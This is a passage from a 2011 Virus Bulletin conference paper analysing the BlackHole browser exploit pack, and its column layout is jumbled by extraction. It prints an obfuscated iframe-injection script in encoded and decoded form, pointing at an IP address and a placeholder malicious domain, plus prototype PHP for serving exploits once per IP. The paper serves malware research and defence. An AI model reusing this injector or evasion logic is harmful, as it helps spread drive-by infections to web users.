(compatible; MSIE 8.0; Windows NT 5.1;
return “Other”;
Trident/4.0;Mozilla/4.0 (compatible; MSIE
} 6.0; Windows NT 5.1; SV1) )}. BEP
writers can capitalize on this information
Listing 6: UAF and exploit serving by the BlackHole BEP.
and transform the attack. A prototype of
UAF that is used to serve exploits is
The BlackHole BEP uses an advanced Traffic Distribution presented in Listing 6.
System (TDS) to handle data from various parts of the world.
Once the location of the victim is determined, information In general, the IE 6.0 browser is still widely exploited. User
about various metrics such as IP address, location, country, agent strings having traces of IE 6.0 are more likely to get
successful hits and malware downloads is collected. The TDS served with the malware. Malware analysts can take
plays a crucial role in managing data from various sources. advantage of that feature to ensure they have an infection to
BlackHole uses a traffic redirection script that is visited by analyse. It is also important to set up that attractive
every infected system through HTTP. Different types of rules environment on initial contact because BEPs reduce the
are configured for segregating data based on the geographical possibility of detection by mapping the user agent for a
locations (IP addresses). As discussed earlier, widgets are used particular IP address and not serving up an exploit after the
explicitly in BlackHole. Generally, widgets are designed to first contact. Figure 4 shows the information disclosed from
manage incoming data by separating them into desired metrics one of the test systems during the analysis.
(IP addresses, country, hits, etc.) that are configured in the
admin panel. Primary and secondary rules are defined to handle IP logging detection trick (IPLDT)
traffic data by redirecting the visitors to appropriate widgets. BEPs continually get smarter. Earlier exploit packs served
After understanding the details of the BlackHole BEP, we malware without keeping records of the IP address. This type
categorized the information gathering and exploit techniques. of infection comes under the standard relation 1: N or N: 1
This process is followed in order to generalize the infection considering the malware spreading pattern. BEPs were
VIRUS BULLETIN CONFERENCE OCTOBER 2011 5
6. BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODY
Figure 4: User agent string information disclosure.
simply serving malware to the same IP address many times used by the BEP in scrutinizing the IP addresses so that
without being detected or analysed. As a result, it was exploits can be served.
possible for malware analysts to download different versions
of exploits by sending consecutive requests to the server. The Dedicated spidering
analysts used the default design of the HTTP protocol to
In dedicated spidering the attacker designates a certain
capture different exploits from BEPs. Nowadays, malware
number of websites as targets which are crawled by
writers have adopted the process of serving malware only
automated spiders to accumulate information from the
once to each IP address. If the connection has been initiated
domain. The information needed by the malware writers
from the same IP address, the infection stops for a specific
depends on the capability of the custom-designed spider.
time period. It depends on the design of BEPs whether they
Spidering modules are used by browser exploit frameworks
serve malware to the same IP address in a particular time
for extensibility in extracting information from the target
frame. This design has reduced the detection process. The
servers and to keep track of the changes taking place. For
BEP uses the GeoLocation PHP library to keep track of IP
example: crawling through a number of websites to scrutinize
addresses based on the country of origin that has already
information about blacklisted websites. This process is known
been served with malware. Listing 7 shows the prototype
as dedicated spidering because the targets are pre-defined and
crawling is directed at garnering information.
<?php session_start();
if (!session_is_registered(“locale”)) { Dynamic storage mutex and
//checkfor the session variable cookies
$db_con = mysql_connect(‘localhost’, ‘geo_user’, ‘geo_password’); BEPs implement the concept of worker threads
if ($db_con) { to access cookies from the websites or web
$ip_chk = sprintf(“%u”, ip2long($_SERVER[‘REMOTE_ADDR’])); applications loaded into the browsers. A worker
mysql_select_db(“geo_ip”, $con); thread acquires a mutex when it accesses a
cookie through a DOM call as ‘document.
$detect = “SELECT ‘’ FROM infected_ip WHERE $ip_chk=$inf_ip”;
cookie’. If a user remains at the page, the
If ( $ip_chk == $detect )
worker thread remains active until the time the
{ // Exploit is already served to this IP} thread quits. BEPs implement a mutex in order
else to keep track of unique visitors through cookies
{ //Serve Exploit to this IPAddress} and to further check the IP address of the
.................} ?> system. This approach uses cookies for
transactional purposes to dynamically update
Listing 7: IP detection and exploit serving. the records once the stats are cleaned from the
6 VIRUS BULLETIN CONFERENCE OCTOBER 2011
7. BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODY
browser. The worker threads release the mutex because the system programs. One of the current choices is polymorphic
browser loader requires the mutex to update the HTTP shellcodes [18]. Basically, polymorphic shellcodes are
responses and to release them from the worker threads. In designed to bypass Network Intrusion Detection Systems
these cases timing works fine, where a mutex is created for a (NIDS) by circumventing the signature and pattern matching.
particular period of time and the worker thread exits after that. It is applied by malware writers to beat detection mechanisms
This process helps in removing duplicates from the BEP at the application level by using obfuscation and encoding
database, thereby serving unique content every time. Again, it schemes iteratively. Polymorphism provides multiple code
is an efficient way of handling data to reduce the load of execution paths so it appears to be random. In addition, if
filtering the victim’s information afterwards. encryption is used as a part of polymorphism, it must have
self-decrypting routines. Polymorphic shellcodes may also
contain operational padding and wild-card code generating
Dynamic iframe generators patterns for bypassing detection modules. A shellcode has to
Primarily, theattackers
With BEP, attackers
Browser exploit packs make extensive use of a dynamic
Primarily, attackers be unwrapped at the client side, once the exploit is triggered
iframe generator for serving iframes to the vulnerable to serve malware.
applications and infected websites on a large scale. Primarily,
In order to understand this tactic, our research has deduced a
the JavaScript obfuscation used by the browser exploit packs
generalized model of Unwrapped JavaScript Shellcode that
is quite strong. It uses a dual encryption to obfuscate the
explains the generic behaviour of shellcode functionality. The
iframes structurally so that anti-virus tools are not able to
model itself is instrumental in a number of exploits used by
detect them. A single iteration makes it hard to decipher the
the attackers to take control of the system. The work flow
website, and recently a number of iterations have been used to
model is presented in Figure 5.
better obfuscate JavaScript in the iframes. We performed
some iterative checks on the requisite code and on decoding. The shellcode first scans through the Process Execution Block
We came up with iframe code as presented in Listing 8. (PEB). The primary goal is to find kernel32.dll so that the
Listing 9 shows the decoded iframe. The iframe uses a script mapping of different modules is easier. The primary DLLs
that utilizes a PUSH instruction to define a stack that executes that are required are kernel32.dll, ntdll.dll and advapi.dll. The
an iframe when rendering in a browser. This shows how shellcode calls the exported functions from the dynamic link
effectively the BlackHole BEP uses dynamic iframes to libraries. The individual exported functions perform the
spread infections. operations as required. The model of Figure 5 explains the
mechanics of the shellcode unwrapping and the way malware
is dropped into the system. The exploitation works in the
Polymorphic shellcodes self unwrap
same manner and system infections start as soon as the
Malware writers are developing methods to bypass certain communication channel opens with the malware-infected
protection mechanisms used by the anti-virus solutions and domain. The programs can be rootkits that are hard to detect.
var ZqhC,CEplPLEDd,YhzRiENx,opHEBheR;YhzRiENx =
eval;ZqhC =””;CEplPLEDd = new Array();CEplPLEDd.
Blacklisting malware tracking domains
push(‘%d#@#@o@@@#%c@@#um#@’);CEplPLEDd. The BlackHole BEP uses blacklisting as one technique to
push(‘@@e#!nt.writ#@@@e#!(‘);CEplPLEDd.push(‘
’<i@#@#f@@#r%@a~@@#m’);CEplPLEDd.push(‘#@@@ prevent tracing of the malware domain by analysts or security
e#! sr@@@#%c@@#=’);CEplPLEDd.push(‘”http:/ researchers. In order to conduct analysis, anti-virus
/92.241.164.7’);CEplPLEDd.push(‘0/@#@%@ companies keep on sending the fuzzy HTTP requests so that
b@l/in%d#@#@#’);CEplPLEDd.push(‘@@@e#!x.
php” wi%d#@#’);CEplPLEDd.push(‘@th=”1”
BlackHole provides a response to them, thereby confirming
h#@@@e#!ight’);CEplPLEDd.push(‘=”0” the presence of malware. In response, BlackHole uses a
@#@#f@@#r%@a~@@’);CEplPLEDd.push(‘#m#@@@ built-in anti-tracing module. In general, this blacklisting
e#!@#@%@b@or%d’);CEplPLEDd.push(‘#@#@#@@@ works in both ways to secure the malware domain and is also
e#!r=”0”></i’);CEplPLEDd.push(‘@#@#f@@#r%@
a~@@#m#@@’);CEplPLEDd.push(‘@e#!>’);’);function used in security-driven websites to prevent access from the
QnXEQ(str) { return str.replace(/[!%#@~]/ malware domain. During the course of this analysis, we have
g,””); }for (var j=0;j<CEplPLEDd.length;j++) derived infection techniques that are used with BlackHole and
{ZqhC = QnXEQ(CEplPLEDd[j]);opHEBheR +=
ZqhC;}YhzRiENx(opHEBheR.substr(9));
similar BEPs.
Listing 8: Iframe used by the BlackHole BEP.
CONCLUSION AND FUTURE WORK
var ZqhC,CEplPLEDd,YhzRiENx,opHEBheR;YhzRiENx = We have audited the BlackHole BEP in order to track the
eval;ZqhC =””;CEplPLEDd = new Array();CEplPLEDd. malware infection techniques. A source code analysis
push(‘docum’);CEplPLEDd.push(‘ent. provides a better grasp of the malware in terms of execution.
write(‘);CEplPLEDd.push(‘’<ifram’);CEplPLEDd.
push(‘e src=’);CEplPLEDd.push(‘”http://mali-
From a general perspective, it is possible only to detect,
cious.com’);CEplPLEDd.push(‘0/bl/ind’);CEplPLEDd. manage and control the infection rate when one is equipped
push(‘ex.php” wid’);CEplPLEDd.push(‘th=”1” with the knowledge of the techniques used by these browser
height’);CEplPLEDd.push(‘=”0” fra’);CEplPLEDd. exploit packs. In this paper, we have discussed the BlackHole
push(‘mebord’);CEplPLEDd.push(‘er=”0”></
i’);CEplPLEDd.push(‘fram’);CEplPLEDd.push(‘e> BEP in detail in order to understand the working and
’);’);function QnXEQ(str) { return str.re- infection strategies that are used to deceive normal users.
place(/[]/g,””); }for (var j=0;j<CEplPLEDd. During the course of this analysis, we have concluded that
length;j++) {ZqhC = QnXEQ(CEplPLEDd[j]);opHEBheR
+= ZqhC;}YhzRiENx(opHEBheR.substr(9));
malware infection is a chain process because one type of
malware supports the other. For example, botnets use BEPs in
Listing 9: Decoded iframe script. order to conduct efficient drive-by-download attacks.
VIRUS BULLETIN CONFERENCE OCTOBER 2011 7
8. BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODY
Figure 5: Shellcode functionality model.
Moreover, BEPs are designed in a sophisticated manner using [3] ZScaler Security Research. Blackhole Exploits kit
appropriate encoding mechanisms. Attack Growing. http://research.zscaler.com/2011/02/
blackhole-exploits-kit-attack-growing.html.
Malware is one of the biggest problems nowadays. It is
becoming really hard to restrict and conquer it. In spite of the [4] Provos, N.; McNamee, D.; Mavrommatis, P.; Wang,
efficient protection technologies to restrain malware, it is K.; Modadugu, N. The Ghost in the Browser:
spreading its tentacles and becoming more advanced day by Analysis of Web-based Malware. Usenix Hotbots
day. BEPs are one of the robust and sophisticated mechanisms Workshop 2007.
used to spread infection by bringing together a lot of [5] Polychronakis, M.; Mavrommatis, P.; Wang, K.;
malware-specific techniques, thereby beating the protection Provos, N. Ghost Turns Zombie: Exploring the Life
shields. Analysis of BEPs and an understanding of their Cycle of Web-based Malware.Usenix LEET
features can help us develop our analysis patterns based on Workshop 2008.
which new protection mechanisms can be developed. We
believe that the World Wide Web will encounter more [6] Bayer, U.; Habibi, I.; Balzarotti, D.; Kirda, E.;
sophisticated versions of BEPs in the near future. This is Kruegel, C. A View on Current Malware Behaviors.
because botnets are impacting the online world at a rapid pace Usenix LEET Workshop 2009.
and BEPs are supporting them in their initial execution [7] Kanich, C.; Levchenko, K.; Enright, B.; Voelker, G.
phases. Our future work will be focused on detecting and M.; Savage, S. The Heisenbot Uncertainty Problem:
analysing other types of BEPs so that techniques can be Challenges in Separating Bots from Chaff. Usenix
enumerated directly from the malware analyses. We are in the LEET Workshop 2008.
process of collecting other BEP samples so that a relational
[8] Malware Domain List.
analysis can be performed in order to derive chronology for
http://www.malwaredomainlist.com/mdl.php.
various developments taking place in BEP history.
[9] Clean MX realtime database.
http://support.clean-mx.de/clean-mx/viruses.php.
REFERENCES
[10] PHP ionCube Encoder. http://www.ioncube.com/
[1] Symantec Security Report – Cyber Attack Toolkits. online_encoder.php.
http://www.symantec.com/about/news/release/
[11] ZeroDay Initiative (ZDI). Sun Java Runtime
article.jsp?prid=20110117_04.
Environment Trusted Methods Chaining Remote
[2] Krebs, B. Java – A Gift to Exploit Pack Makers. Code Execution Vulnerability.
http://krebsonsecurity.com/2010/10/java-a-gift-to- http://www.zerodayinitiative.com/advisories/ZDI-10-
exploit-pack-makers/. 056/.
8 VIRUS BULLETIN CONFERENCE OCTOBER 2011
9. BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODY
[12] ZeroDay Initiative (ZDI). Sun Java Runtime
Environment MixerSequencer Invalid Array Index
Remote Code Execution Vulnerability.
http://www.zerodayinitiative.com/advisories/ZDI-10-
060/.
[13] Malware at Stake. Java OBE + BlackHole – Dead
Man Rising. http://secniche.blogspot.com/2011/02/
java-obe-tookit-exploits-blackhole-dead.html.
[14] Felegyhazi, M.; Kreibich, C. On the Potential of
Proactive Domain Blacklisting. Usenix LEET
Workshop 2010.
[15] MaxMind. http://www.maxmind.com/app/php.
[16] RFC 2616. http://www.w3.org/Protocols/rfc2616/
rfc2616.html.
[17] Park, B.; Hong, S.; Oh, J.; Lee, H. Defending against
Spying with Browser Helper Objects.
http://ccs.korea.ac.kr/papers/tech05_01.pdf.
(Technical Report) 2005.
[18] Polychronakis, M.; Anagnostakis, K.G.; Markatos,
E.P. An Empirical Study of Real-world Polymorphic
Code Injection Attacks. Usenix LEET Workshop
2009.
VIRUS BULLETIN CONFERENCE OCTOBER 2011 9